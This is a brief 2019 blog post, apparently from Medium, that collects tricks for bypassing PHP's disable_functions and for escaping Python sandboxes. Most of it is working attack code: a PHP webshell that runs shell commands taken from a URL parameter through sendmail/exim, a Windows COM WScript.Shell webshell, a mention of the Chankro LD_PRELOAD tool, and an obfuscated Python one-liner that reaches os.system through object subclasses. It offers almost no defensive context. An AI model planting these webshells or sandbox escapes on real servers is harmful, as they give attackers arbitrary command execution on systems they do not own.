Some simple bypass tricks
Published in
2 min readFeb 18, 2019
Bypass Disable Functions
Configuration
disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
Linux
- sendmail -> exim bypass
<?php
$command_file = "/tmp/xxxx";
$output_file = "/tmp/xxxx";
$cmd = $argv[1] ? $argv[1] : $_GET['cmd'];
$cmd = "$cmd > $output_file";file_put_contents($command_file, $cmd);
mail("root@localhost", "xnxx", "jav", null,
'-xnxxjav@jav(tmp1 -be ${run{/bin/sh${substr{10}{1}{$tod_log}}'.$command_file.'}} tmp2)');
echo file_get_contents($output_file);
unlink($output_file);
unlink($command_file);
- LD_PRELOAD bypass
tools : Chankro
Windows
- use
COM
to bypass
<?php
$runCommand = "C:\\WINDOWS\\system32\\cmd.exe /c {$_GET['cmd']}"; //Wrong by purpuse to get some good output
$WshShell = new COM("WScript.Shell");
$output = $WshShell->Exec($runCommand)->StdOut->ReadAll;
echo "<p>$output</p>";
?>
Ref
Bypass Python Sandbox
Python
__builtins__
Is a reference to the following modules:
python2: __builtin__
python3: builtins
Tactic
1. Use the following code to access some modules:
[].__class__.__base__.__subclasses__()
2. Use the following code to access the module imported by a module:
module.__init__.__globals__
3. Some of the modules accessed at the first point are imported os
or sys
modules:
python2:
<class 'site._Printer'>
<class 'site.Quitter'>
<class warnings.catch_warnings>
<class 'warnings.WarningMessage'>python3:
<class '_sitebuiltins.Quitter'>
<class '_sitebuiltins._Printer'>
Then use the second point to access the os module.
4. Some poses can look at abusing and n poses in ref
some interesting stdandard modules
- https://docs.python.org/2/library/types.html
types.FileType Read files
- https://docs.python.org/2/library/timeit.html
timeit.timeit execute code
- https://docs.python.org/2/library/inspect.html
You can guess the code structure, like: inspect.getmembers
- https://docs.python.org/2/library/pickle.html
pickle.loads execute command
- https://docs.python.org/2/library/os.html
os.popen Execute commands
- https://docs.python.org/2/library/commands.html commands.getstatusoutput Execute commands
- https://docs.python.org/2/library/subprocess.html
subprocess.popen Execute the command
- https://docs.python.org/2/library/io.html
io.open Reading files
- https://docs.python.org/2/library/platform.html
platform.popen command execution
final
Chestnut:
python3:
[w for w in 1..__class__.__base__.__subclasses__() if w.__name__=='Quitter'][0].__init__.__globals__['sy'+'s'].modules['o'+'s'].__dict__['sy'+'stem']('ls')